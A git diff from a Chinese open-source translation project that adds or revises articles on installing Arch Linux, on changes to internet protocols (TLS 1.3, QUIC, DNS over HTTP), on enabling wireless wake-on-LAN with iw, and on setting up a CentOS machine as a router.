||||
|
||||
我们在这里讨论的安装方法是从你的电脑上**完全删除已有的操作系统** ,而后在其上安装 Arch Linux。如果你想遵循这一教程安装 Arch,请确保你已经备份了所有文件,否则你就会失去它们。切切。
|
||||
|
||||
在你从 USB 上安装 Arch 之前,请确保你已经满足了以下条件:
|
||||
|
||||
#### 安装 Arch Linux 的条件:
|
||||
|
||||
* 一个兼容 x86_64(例如 64 位)的机器
|
||||
* 最小 512M 内存(建议 2GB)
|
||||
* 最少 1GB 的磁盘空余空间(日常使用推荐 20GB)
|
||||
* 可以访问互联网
|
||||
* 至少有 2GB 存储空间的 USB 存储器
|
||||
* 熟悉 Linux 命令行
|
||||
|
||||
一旦你确认满足所有条件,就可以开始安装 Arch Linux 了。
|
||||
|
||||
#### 第一步:下载 ISO 文件
|
||||
|
||||
你可以从[官网][6]上下载 ISO。安装 Arch Linux 需要一个至少有 512M 内存和 800M 磁盘空间,并兼容 x86_64 (如 64 位)的机器。不过,建议至少有 2G 内存和 20G 磁盘空间,这样安装桌面环境时就不会遇到麻烦。
|
||||
|
||||
#### 第二步:创建一个 Arch Linux 的现场版 USB 存储器
|
||||
|
||||
我们需要用你刚刚下载的 ISO 文件创建一个 Arch Linux 的<ruby>现场版<rt>live</rt></ruby> USB 存储器。
|
||||
|
||||
如果你使用 Linux,你可以用 `dd` 命令来创建现场版 USB 存储器。 记得将下面的例子中的 `/path/to/archlinux.iso` 改成你的 ISO 文件的实际存储位置,`/dev/sdx` 改成你的磁盘设备号(例如 `/dev/sdb`)。你可以通过 [lsblk][7] 命令来了解你的设备信息。
|
||||
|
||||
```
|
||||
dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync
|
||||
```
|
||||
在 Windows 下,有多种方法来创建现场版 USB 存储器。 推荐工具是 Rufus。我们之前已经有[如何使用这一工具创建 Antergos 现场版 USB 存储器][8]的教程。因为 Antergos 发行版是基于 Arch 的,所以你可以使用同一教程。
|
||||
|
||||
#### 步骤三:从现场版 USB 存储器上启动
|
||||
|
||||
一旦你已经创建了 Arch Linux 的现场版 USB 存储器,关闭你的电脑。插上你的 USB 存储器然后启动系统。在开机启动时,持续按 F2、F10 或 F1 之类的按键(根据你的电脑型号而定)进入启动设置。在这里,选择“从 USB 存储器或可移除设备启动”这一项。
|
||||
|
||||
一旦你选择了它,你会看到这样一个选项:
|
||||
|
||||
![Arch Linux][9]
|
||||
|
||||
选择“Boot Arch Linux (x86\_64)”。经过各种系统检查后,Arch Linux 会启动到 root 用户的命令行界面。
|
||||
|
||||
接下来的步骤包括磁盘分区、创建文件系统并挂载它。
|
||||
|
||||
#### 第四步:磁盘分区
|
||||
|
||||
第一步就是给你的硬盘分区。单根分区是最简单的,就在它上面创建根(`/`)分区、交换分区和 `home` 分区。
|
||||
|
||||
我有一个 19G 的硬盘,我想在这儿安装 Arch Linux。为了创建分区,输入:
|
||||
|
||||
```
|
||||
fdisk /dev/sda
|
||||
```
|
||||
|
||||
按 `n` 创建新分区。按 `p` 创建主分区,然后选择分区号。
|
||||
|
||||
第一个扇区会被自动选择,你只要按回车键。在确定分区的最后一个扇区时,请输入这一分区的大小。
|
||||
|
||||
用相同的方法为 `home` 和交换分区创建两个分区,按 `w` 来保存修改并退出。
|
||||
|
||||
![root partition][10]
|
||||
|
||||
|
||||
#### 第四步:创建文件系统
|
||||
|
||||
因为我们已经有了三个分区,接下来就是创建文件系统来格式化分区。
|
||||
|
||||
我们用 `mkfs` 命令在根分区和 `home` 分区上创建文件系统,用 `mkswap` 创建交换分区。我们用 ext4 文件系统格式化磁盘。
|
||||
|
||||
```
|
||||
mkfs.ext4 /dev/sda1
|
||||
mkfs.ext4 /dev/sda3
|
||||
|
||||
mkswap /dev/sda2
|
||||
swapon /dev/sda2
|
||||
```
|
||||
|
||||
将这些分区挂载在根分区和 `home` 分区下:
|
||||
|
||||
```
|
||||
mount /dev/sda1 /mnt
|
||||
mkdir /mnt/home
|
||||
mount /dev/sda3 /mnt/home
|
||||
```
|
||||
|
||||
#### 第五步:安装
|
||||
|
||||
我们已经创建分区并挂载了分区,开始安装最基本的软件包。基本的软件包包括了系统运行所必需的所有软件包。比如有 GNU BASH shell、文件压缩工具、文件系统管理工具、C 语言库、压缩工具、Linux 内核及其模块,类库、系统工具、USB 设备工具、Vi 文本编辑器等等。
|
||||
|
||||
```
|
||||
pacstrap /mnt base base-devel
|
||||
```
|
||||
|
||||
#### 第六步:配置系统
|
||||
|
||||
生成一个 `fstab` 文件来规定磁盘分区、块设备,或者远程文件系统是如何挂载进文件系统中的。
|
||||
|
||||
```
|
||||
genfstab -U /mnt >> /mnt/etc/fstab
|
||||
```
|
||||
|
||||
进入 chroot 环境,这样可以为当前进程以及子进程切换当前根目录。
|
||||
|
||||
```
|
||||
arch-chroot /mnt
|
||||
```
|
||||
|
||||
一些需要与数据总线保持连接的 systemd 工具不能在 chroot 环境下使用,所以需要从当前环境退出。想要退出 chroot,就用下面的命令:
|
||||
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
#### 第七步:设定时区
|
||||
|
||||
用下面这条命令设定时区:
|
||||
|
||||
```
|
||||
ln -sf /usr/share/<时区信息>/<地区>/<城市> /etc/localtime
|
||||
```
|
||||
|
||||
获取时区列表,输入:
|
||||
|
||||
```
|
||||
ls /usr/share/zoneinfo
|
||||
```
|
||||
|
||||
用 `hwclock` 命令设定硬件时钟:
|
||||
|
||||
```
|
||||
hwclock --systohc --utc
|
||||
```
|
||||
|
||||
#### 第八步:设置地区
|
||||
|
||||
文件 `/etc/locale.gen` 在注释里包含了所有地区和系统语言设置。用 Vi 打开它,然后去掉你希望选择语言前面的注释。 我选择了 `en_GB.UTF-8`。
|
||||
|
||||
现在用下面的命令在 `/etc` 文件夹里生成 关于地区的配置文件:
|
||||
|
||||
```
|
||||
locale-gen
|
||||
echo LANG=en_GB.UTF-8 > /etc/locale.conf
|
||||
export LANG=en_GB.UTF-8
|
||||
```
|
||||
|
||||
#### 第九步 :安装 bootloader,设置主机名和 root 密码
|
||||
|
||||
创建 `/etc/hostname` 文件 然后添加一个对应的主机名:
|
||||
|
||||
```
|
||||
127.0.1.1 myhostname.localdomain myhostname
|
||||
```
|
||||
|
||||
我添加了 `ItsFossArch` 作为我的主机名:
|
||||
|
||||
```
|
||||
echo ItsFossArch > /etc/hostname
|
||||
```
|
||||
|
||||
然后也将它添加到 `/etc/hosts` 中
|
||||
|
||||
为了安装 bootloader 使用下面的命令:
|
||||
|
||||
```
|
||||
pacman -S grub
|
||||
grub-install /dev/sda
|
||||
grub-mkconfig -o /boot/grub/grub.cfg
|
||||
```
|
||||
|
||||
创建 root 密码,输入:
|
||||
|
||||
```
|
||||
passwd
|
||||
```
|
||||
|
||||
输入你想要的密码。
|
||||
|
||||
完成之后,更新你的系统。但很有可能你的系统已经是最新的,因为你下载的是最新的 ISO。
|
||||
|
||||
```
|
||||
pacman -Syu
|
||||
```
|
||||
|
||||
恭喜! 你已经安装了 Arch Linux 的命令行版本。
|
||||
|
||||
接下来,我们会了解到如何为 Arch 设置并安装一个桌面环境。我很喜欢 GNOME 桌面环境,所以在这儿也就选择了这个。
|
||||
|
||||
#### 第十步:安装桌面(这一例子中是 GNOME)
|
||||
|
||||
在你安装桌面之前,你需要先设置网络。
|
||||
|
||||
你可以用下面的命令看见你的端口:
|
||||
|
||||
```
|
||||
ip link
|
||||
```
|
||||
|
||||
![][11]
|
||||
|
||||
在我的电脑上,端口名是 `enp0s3`。
|
||||
|
||||
将下面这一段加进文件中:
|
||||
|
||||
```
|
||||
vi /etc/systemd/network/enp0s3.network
|
||||
|
||||
[Match]
|
||||
name=en*
|
||||
[Network]
|
||||
DHCP=yes
|
||||
```
|
||||
|
||||
保存并退出。重启网络来应用你刚才的改动。
|
||||
|
||||
```
|
||||
systemctl restart systemd-networkd
|
||||
systemctl enable systemd-networkd
|
||||
```
|
||||
|
||||
将下面这两句话加进 `/etc/resolv.conf` 中
|
||||
|
||||
```
|
||||
nameserver 8.8.8.8
|
||||
nameserver 8.8.4.4
|
||||
```
|
||||
|
||||
下一步是安装 X 环境。
|
||||
|
||||
输入下面的命令安装 Xorg,并将它作为显示服务器。
|
||||
|
||||
```
|
||||
pacman -S xorg xorg-server
|
||||
```
|
||||
|
||||
`gnome` 软件包包含了基本的 GNOME 桌面,`gnome-extra` 则包含 GNOME 应用、归档管理器、磁盘管理器、文本编辑器和其它的应用。
|
||||
|
||||
```
|
||||
pacman -S gnome gnome-extra
|
||||
```
|
||||
|
||||
最后一步是在 Arch 上开启 GDM 显示管理器。
|
||||
|
||||
```
|
||||
systemctl start gdm.service
|
||||
systemctl enable gdm.service
|
||||
```
|
||||
|
||||
重启你的系统,你就会看见 GNOME 的登录界面。
|
||||
|
||||
### Arch Linux 安装总结
|
||||
|
||||
我们在下面的视频中展示了一个由 It's FOSS 读者 Gonzalo Tormo 提供的相似的安装方法(全屏观看,能更好地看清命令):
|
||||
|
||||
![视频](https://youtu.be/iENmRwVhsTQ)
|
||||
|
||||
你也许意识到安装 Arch 不像[安装 Ubuntu][12] 一样简单。不过,只要有耐心,你一定可以安装好它,并且向全世界宣布你在用 Arch Linux。
|
||||
|
||||
Arch Linux 安装过程本身就是一个学习的机会。一旦安装完毕,我建议你参考它的 Wiki 去尝试其它的桌面环境,从而更深入了解这一操作系统。你可以探索它,发现它的强大之处。
|
||||
|
||||
如果你在安装 Arch 的过程中遇到任何问题,请在评论中给我们留言。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/install-arch-linux/
|
||||
|
||||
作者:[Ambarish Kumar][a]
|
||||
译者:[wenwensnow](https://github.com/wenwensnow)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ambarish/
|
||||
[1]:https://www.archlinux.org/
|
||||
[2]:https://en.wikipedia.org/wiki/Do_it_yourself
|
||||
[3]:https://wiki.archlinux.org/index.php/pacman
|
||||
[4]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png
|
||||
[6]:https://www.archlinux.org/download/
|
||||
[7]:https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems
|
||||
[8]:https://itsfoss.com/live-usb-antergos/
|
||||
[9]:https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg
|
||||
[10]:https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png
|
||||
[11]:https://itsfoss.com/wp-content/uploads/2017/12/11.png
|
||||
[12]:https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/
|
||||
[13]:https://wiki.archlinux.org/
|
@ -41,7 +41,7 @@
|
||||
|
||||
值得注意的是,尽管存在这些变化,HTTP/2 并没有出现明显的互操作性问题或者来自网络的冲突。
|
||||
|
||||
#### TLS 1.3
|
||||
### TLS 1.3
|
||||
|
||||
[TLS 1.3][21] 刚刚通过了标准化的最后流程,并且已经被一些实现所支持。
|
||||
|
||||
@ -57,75 +57,75 @@ TLS 1.3 并不支持那些窃听通讯的特定技术,因为那也是 [一种
|
||||
|
||||
在这一点上,TLS 1.3 看起来不会去改变以适应这些网络,但是,关于去创建另外一种协议有一些传言,这种协议允许第三方去偷窥通讯内容,或者做更多的事情。这件事是否会得到推动还有待观察。
|
||||
|
||||
#### QUIC
|
||||
### QUIC
|
||||
|
||||
在 HTTP/2 工作期间,可以很明显地看到 TCP 是很低效率的。因为 TCP 是一个按顺序发送的协议,丢失的包阻止了在缓存中的后面等待的包被发送到应用程序。对于一个多路协议来说,这对性能有很大的影响。
|
||||
在 HTTP/2 工作中,可以很明显地看到 TCP 有相似的低效率。因为 TCP 是一个按顺序发送的协议,一个数据包的丢失可能阻止其后面缓存区中的数据包被发送到应用程序。对于一个多路复用协议来说,这对性能有很大的影响。
|
||||
|
||||
[QUIC][23] 是尝试去解决这种影响而在 UDP 之上重构的 TCP 语义(属于 HTTP/2 的流模型的一部分)像 HTTP/2 一样,它作为 Google 的一项成果被发起,并且现在已经进入了 IETF,它最初是作为一个 HTTP-over-UDP 的使用案例,并且它的目标是在 2018 年成为一个标准。但是,因为 Google 在 Chrome 浏览器和它的网站上中已经部署了 QUIC,它已经占有了互联网通讯超过 7% 的份额。
|
||||
[QUIC][23] 尝试去解决这种影响而在 UDP 之上重构了 TCP 语义(以及 HTTP/2 流模型的一部分)。像 HTTP/2 一样,它始于 Google 的一项成果,并且现在已经被 IETF 接纳作为一个 HTTP-over-UDP 的初始用例,其目标是在 2018 年底成为一个标准。然而,因为 Google 已经在 Chrome 浏览器及其网站上部署了 QUIC,它已经占有了超过 7% 的互联网通讯份额。
|
||||
|
||||
阅读 [关于 QUIC 的答疑][24]
|
||||
- 阅读 [关于 QUIC 的答疑][24]
|
||||
|
||||
除了大量的通讯(以及隐含的可能的网络调整)从 TCP 到 UDP 的转变之外,Google QUIC(gQUIC)和 IETF QUIC(iQUIC)都要求完全加密;这里没有非加密的 QUIC。
|
||||
除了大量的通讯从 TCP 到 UDP 的转变(以及隐含的可能的网络调整)之外,Google QUIC(gQUIC)和 IETF QUIC(iQUIC)都要求全程加密;并没有非加密的 QUIC。
|
||||
|
||||
iQUIC 使用 TLS 1.3 去为一个会话创建一个密码,然后使用它去加密每个包。然而,因为,它是基于 UDP 的,在 QUIC 中许多会话信息和元数据在加密后的 TCP 包中被公开。
|
||||
iQUIC 使用 TLS 1.3 来为会话建立密钥,然后使用它去加密每个数据包。然而,由于它是基于 UDP 的,许多 TCP 中公开的会话信息和元数据在 QUIC 中被加密了。
|
||||
|
||||
事实上,iQUIC 当前的 [‘短报文头’][25] — 被用于除了握手外的所有包 — 仅公开一个包编号、一个可选的连接标识符、和一个状态字节,像加密密钥转换计划和包字节(它最终也可能被加密)。
|
||||
事实上,iQUIC 当前的 [‘短报文头’][25] 被用于除了握手外的所有包,仅公开一个包编号、一个可选的连接标识符和一个状态字节,像加密密钥轮换计划和包字节(它最终也可能被加密)。
|
||||
|
||||
其它的所有东西都被加密 — 包括 ACKs,以提高 [通讯分析][26] 攻击的门槛。
|
||||
其它的所有东西都被加密 —— 包括 ACK,以提高 [通讯分析][26] 攻击的门槛。
|
||||
|
||||
然而,这意味着被动估算 RTT 和通过观察连接的丢失包将不再变得可能;因为这里没有足够多的信息了。在一些运营商中,由于缺乏可观测性,导致了大量的担忧,它们认为像这样的被动测量对于他们调试和了解它们的网络是至关重要的。
|
||||
然而,这意味着通过观察连接来被动估算 RTT 和包丢失率将不再变得可行;因为没有足够多的信息。在一些运营商中,由于缺乏可观测性,导致了大量的担忧,它们认为像这样的被动测量对于他们调试和了解它们的网络是至关重要的。
|
||||
|
||||
为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]‘ — 在报文头中的一个 bit,它是一个往返的开关,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。
|
||||
为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]’ — 这是在报文头中的一个回程翻转的位,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。
|
||||
|
||||
#### DOH
|
||||
### DOH
|
||||
|
||||
可以肯定的即将发生的变化是 DOH — [DNS over HTTP][28]。[大量的研究表明,对网络实施策略的一个常用手段是通过 DNS 实现的][29](是否代表网络运营商或者一个更大的权威)。
|
||||
即将发生的变化是 DOH — [DNS over HTTP][28]。[大量的研究表明,对网络实施政策干预的一个常用手段是通过 DNS 实现的][29](无论是代表网络运营商或者一个更大的权力机构)。
|
||||
|
||||
使用加密去规避这种控制已经 [讨论了一段时间了][30],但是,它有一个不利条件(至少从某些立场来看)— 它可能从其它的通讯中被区别对待;例如,通过利用它的端口号被阻止访问。
|
||||
使用加密去规避这种控制已经 [讨论了一段时间了][30],但是,它有一个不利条件(至少从某些立场来看)— 它可能与其它通讯区别对待;例如,通过它的端口号被阻止访问。
|
||||
|
||||
DOH 将 DNS 通讯稍带在已经建立的 HTTP 连接上,因此,消除了任何的鉴别器。一个网络希望去阻止访问,仅需要去阻止 DNS 解析就可以做到阻止对特定网站的访问。
|
||||
DOH 将 DNS 通讯搭载在已经建立的 HTTP 连接上,因此,消除了任何的鉴别器。希望阻止访问该 DNS 解析器的网络只能通过阻止对该网站的访问来实现。
|
||||
|
||||
例如,如果 Google 在 <tt style="box-sizing: inherit;">www.google.com</tt> 上部署了它的 [基于 DOH 的公共 DNS 服务][31] 并且一个用户配置了它的浏览器去使用它,一个希望(或被要求的)被停止的网络,它将被 Google 有效的全部阻止(向他们提供的服务致敬!)。
|
||||
例如,如果 Google 在 www.google.com 上部署了它的 [基于 DOH 的公共 DNS 服务][31],并且一个用户配置了它的浏览器去使用它,一个希望(或被要求的)被停止访问该服务的网络,将必须阻止对 Google 的全部访问(向他们提供的服务致敬!)(LCTT 译注:他们做到了)。
|
||||
|
||||
DOH 才刚刚开始,但它已经引起很多人的兴趣和一些部署的声音。通过使用 DNS 来实施策略的网络(和政府机构)如何反应还有待观察。
|
||||
DOH 才刚刚开始,但它已经引起很多人的兴趣,并有了一些部署的传闻。通过使用 DNS 来实施政策影响的网络(和政府机构)如何反应还有待观察。
|
||||
|
||||
阅读 [IETF 100, Singapore: DNS over HTTP (DOH!)][1]
|
||||
|
||||
#### 骨化和润滑
|
||||
### 僵化和润滑
|
||||
|
||||
让我们返回到协议变化的动机,其中一个主题是吞吐量,协议设计者们遇到的越来越多的问题是怎么去假设关于通讯的问题。
|
||||
让我们返回到协议变化的动机,有一个主题贯穿了这项工作,协议设计者们遇到的越来越多的问题是网络对流量的使用做了假设。
|
||||
|
||||
例如,TLS 1.3 有一个使用旧版本协议的中间设备的最后结束时间的问题。gQUIC 黑名单控制网络的 UDP 通讯,因为,它们认为那是有害的或者是低优先级的通讯。
|
||||
例如,TLS 1.3 有一些临门一脚的问题是中间设备假设它是旧版本的协议。gQUIC 将几个对 UDP 通讯进行限流的网络列入了黑名单,因为,那些网络认为 UDP 通讯是有害的或者是低优先级的。
|
||||
|
||||
当一个协议因为已部署而 “冻结” 它的可扩展点导致不能被进化,我们称它为 _已骨化_ 。TCP 协议自身就是一个严重骨化的例子,因此,很中间设备在 TCP 上做了很多的事情 — 是否阻止有无法识别的 TCP 选项的数据包,或者,优化拥塞控制。
|
||||
当一个协议因为已有的部署而 “冻结” 它的可扩展点,从而导致不能再进化,我们称它为 _已经僵化了_ 。TCP 协议自身就是一个严重僵化的例子,因此,太多的中间设备在 TCP 协议上做了太多的事情,比如阻止了带有无法识别的 TCP 选项的数据包,或者,“优化”了拥塞控制。
|
||||
|
||||
有必要去阻止骨化,去确保协议可以被进化,以满足未来互联网的需要;否则,它将成为一个 ”公共的悲剧“,它只能是满足一些个别的网络行为的地方 — 虽然很好 — 但是将影响整个互联网的健康发展。
|
||||
防止僵化是有必要的,确保协议可以进化以满足未来互联网的需要;否则,它将成为一个“公共灾难”,一些个别网络的行为 —— 虽然在那里工作的很好 —— 但将影响整个互联网的健康发展。
|
||||
|
||||
这里有很多的方式去阻止骨化;如果被讨论的数据是加密的,它并不能被任何一方所访问,但是持有密钥的人,阻止了干扰。如果扩展点是未加密的,但是在一种可以打破应用程序可见性(例如,HTTP 报头)的方法被常规使用后,它不太可能会受到干扰。
|
||||
有很多的方式去防止僵化;如果被讨论的数据是加密的,它并不能被除了持有密钥的人之外任何一方所访问,阻止了干扰。如果扩展点是未加密的,但是通常以一种可以明显中断应用程序的方法使用(例如,HTTP 报头),它不太可能受到干扰。
|
||||
|
||||
协议设计者不能使用加密的地方和一个不经常使用的扩展点、人为发挥的可利用的扩展点;我们称之为 _润滑_ 它。
|
||||
协议设计者不能使用加密的扩展点不经常使用的情况下,人为地利用扩展点——我们称之为 _润滑_ 它。
|
||||
|
||||
例如,QUIC 鼓励终端在 [版本协商][32] 中使用一系列的诱饵值,去避免它永远不变化的假定实现(就像在 TLS 实现中经常遇到的导致重大问题的情况)。
|
||||
例如,QUIC 鼓励终端在 [版本协商][32] 中使用一系列的诱饵值,来避免假设它的实现永远不变化(就像在 TLS 实现中经常遇到的导致重大问题的情况)。
|
||||
|
||||
#### 网络和用户
|
||||
### 网络和用户
|
||||
|
||||
除了避免骨化的愿望外,这些变化也反映出了网络和它们的用户之间的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 — 或者至少是公正的 — 这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。
|
||||
除了避免僵化的愿望外,这些变化也反映出了网络和它们的用户之间关系的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 —— 或者至少是公正的 —— 但这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。
|
||||
|
||||
因此,互联网用户的整体需求和那些想去访问流经它们的网络的用户数据的网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施策略的网络;例如,企业网络。
|
||||
因此,当那些网络想去访问一些流经它们的网络的用户数据时,互联网用户的整体需求和那些网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施政策干预的网络;例如,企业网络。
|
||||
|
||||
在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不是所有者或者能够访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。
|
||||
在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不拥有或无法访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。
|
||||
|
||||
因此,在 IETF 中围绕协议开发的许多讨论,是去接触企业和其它的 ”叶子“ 网络之间偶尔的需求竞争,并且这对互联网的整体是有好处的。
|
||||
因此,在 IETF 中围绕协议开发的许多讨论,触及了企业和其它的 “叶子” 网络有时相互竞争的需求,以及互联网整体的好处。
|
||||
|
||||
#### 参与
|
||||
### 参与
|
||||
|
||||
为了让互联网在以后工作的更好,它需要为终端用户提供价值、避免骨化、并且允许网络去控制。现在发生的变化需要去满足所有的三个目标,但是,我们需要网络运营商更多的投入。
|
||||
为了让互联网在以后工作的更好,它需要为终端用户提供价值、避免僵化、让网络有序运行。现在正在发生的变化需要满足所有的三个目标,但是,人们需要网络运营商更多的投入。
|
||||
|
||||
如果这些变化影响你的网络 — 或者没有影响 — 请在下面留下评论,或者更好用了,通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。
|
||||
如果这些变化影响你的网络 —— 或者没有影响 —— 请在下面留下评论。更好地可以通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。
|
||||
|
||||
感谢 Martin Thomson 和 Brian Trammell 的评论。
|
||||
|
||||
_Mark Nottingham 是互联网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的共同主持人。_
|
||||
_本文作者 Mark Nottingham 是互联网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的联席主席。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
@ -133,7 +133,7 @@ via: https://blog.apnic.net/2017/12/12/internet-protocols-changing/
|
||||
|
||||
作者:[Mark Nottingham][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,149 @@
|
||||
如何为 Linux 无线网卡配置无线唤醒功能
|
||||
======
|
||||
|
||||
我有一台用于备份我的所有设备的网络存储(NAS)服务器。然而当我备份我的 Linux 笔记本时遇到了困难。当它休眠或挂起时我不能备份它。当我使用基于 Intel 的无线网卡时,我可以配置笔记本上的 WiFi 接受无线唤醒吗?
|
||||
|
||||
<ruby>[网络唤醒][2]<rt>Wake-on-LAN</rt></ruby>(WOL)是一个以太网标准,它允许服务器通过一个网络消息而被打开。你需要发送一个“魔法数据包”到支持网络唤醒的以太网卡和主板,以便打开被唤醒的系统。
|
||||
|
||||
[![linux-configire-wake-on-wireless-lan-wowlan][1]][1]
|
||||
|
||||
<ruby>无线唤醒<rt>wireless wake-on-lan</rt></ruby>(WoWLAN 或 WoW)允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态,依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。
|
||||
|
||||
> 请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。
|
||||
|
||||
### 语法
|
||||
|
||||
在 Linux 系统上,你需要使用 `iw` 命令来查看和操作无线设备及其配置。 其格式为:
|
||||
|
||||
```
|
||||
iw command
|
||||
iw [options] command
|
||||
```
|
||||
|
||||
### 列出所有的无线设备及其功能
|
||||
|
||||
输入下面命令:
|
||||
|
||||
```
|
||||
$ iw list
|
||||
$ iw list | more
|
||||
$ iw dev
|
||||
```
|
||||
|
||||
输出为:
|
||||
|
||||
```
|
||||
phy#0
|
||||
Interface wlp3s0
|
||||
ifindex 3
|
||||
wdev 0x1
|
||||
addr 6c:88:14:ff:36:d0
|
||||
type managed
|
||||
channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz
|
||||
txpower 15.00 dBm
|
||||
```
|
||||
|
||||
请记下这个 `phy0`。
|
||||
|
||||
### 查看无线唤醒的当前状态
|
||||
|
||||
打开终端并输入下面命令来查看无线网络的状态:
|
||||
|
||||
```
|
||||
$ iw phy0 wowlan show
|
||||
```
|
||||
|
||||
输出为:
|
||||
|
||||
```
|
||||
WoWLAN is disabled
|
||||
```
|
||||
|
||||
### 如何启用无线唤醒
|
||||
|
||||
启用的语法为:
|
||||
|
||||
`sudo iw phy {phyname} wowlan enable {option}`
|
||||
|
||||
其中,
|
||||
|
||||
1. `{phyname}` - 使用 `iw dev` 来获取其物理名。
|
||||
2. `{option}` - 可以是 `any`、`disconnect`、`magic-packet` 等。
|
||||
|
||||
比如,我想为 `phy0` 开启无线唤醒:
|
||||
|
||||
```
|
||||
$ sudo iw phy0 wowlan enable any
|
||||
```
|
||||
或者:
|
||||
|
||||
```
|
||||
$ sudo iw phy0 wowlan enable magic-packet disconnect
|
||||
```
|
||||
|
||||
检查一下:
|
||||
|
||||
```
|
||||
$ iw phy0 wowlan show
|
||||
```
|
||||
|
||||
结果为:
|
||||
|
||||
```
|
||||
WoWLAN is enabled:
|
||||
* wake up on disconnect
|
||||
* wake up on magic packet
|
||||
```
|
||||
|
||||
### 测试一下
|
||||
|
||||
将你的笔记本挂起或者进入休眠模式:
|
||||
|
||||
```
|
||||
$ sudo sh -c 'echo mem > /sys/power/state'
|
||||
```
|
||||
|
||||
从 NAS 服务器上使用 [ping 命令][3] 发送 ping 请求
|
||||
|
||||
```
|
||||
$ ping your-laptop-ip
|
||||
```
|
||||
|
||||
也可以 [使用 `wakeonlan` 命令发送魔法数据包][4]:
|
||||
|
||||
```
|
||||
$ wakeonlan laptop-mac-address-here
|
||||
$ etherwake MAC-Address-Here
|
||||
```
|
||||
|
||||
### 如何禁用无线唤醒?
|
||||
|
||||
语法为:
|
||||
|
||||
```
|
||||
$ sudo iw phy {phyname} wowlan disable
|
||||
$ sudo iw phy0 wowlan disable
|
||||
```
|
||||
|
||||
更多信息请阅读 `iw` 命令的 man 页:
|
||||
|
||||
```
|
||||
$ man iw
|
||||
$ iw --help
|
||||
```
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://twitter.com/nixcraft
|
||||
[1]: https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg
|
||||
[2]: https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
|
||||
[3]: https://www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info)
|
||||
[4]: https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/
|
@ -0,0 +1,92 @@
|
||||
将安装了 CentOS/RHEL 6/7 的机器转变成路由器
|
||||
======
|
||||
|
||||
在本文中,我们将学习通过使用 NAT 技术将安装有 RHEL/CentOS 6 & 7 的机器转变成路由器来用。 我们都知道,路由器是一个工作在第三层的网络设备,用于将两个或多个网络连接在一起,即,将局域网连接到广域网上,或者将局域网直接互联。 路由器非常昂贵,尤其对于小型组织来说更是如此,这可能是我们关注路由器的一个原因。 与其使用专用硬件,不如让我们用 Linux 机器转换成路由器来用。
|
||||
|
||||
RHEL/CentOS 6 和 7 上的操作过程我们都会讲。但在开始之前, 让我们先看看需要准备那些东西。
|
||||
|
||||
### 前期条件
|
||||
|
||||
1、 一台装有 RHEL/CentOS 6 或 7 的机器
|
||||
|
||||
2、两块分别配有本地 IP 和外网 IP 的网卡
|
||||
|
||||
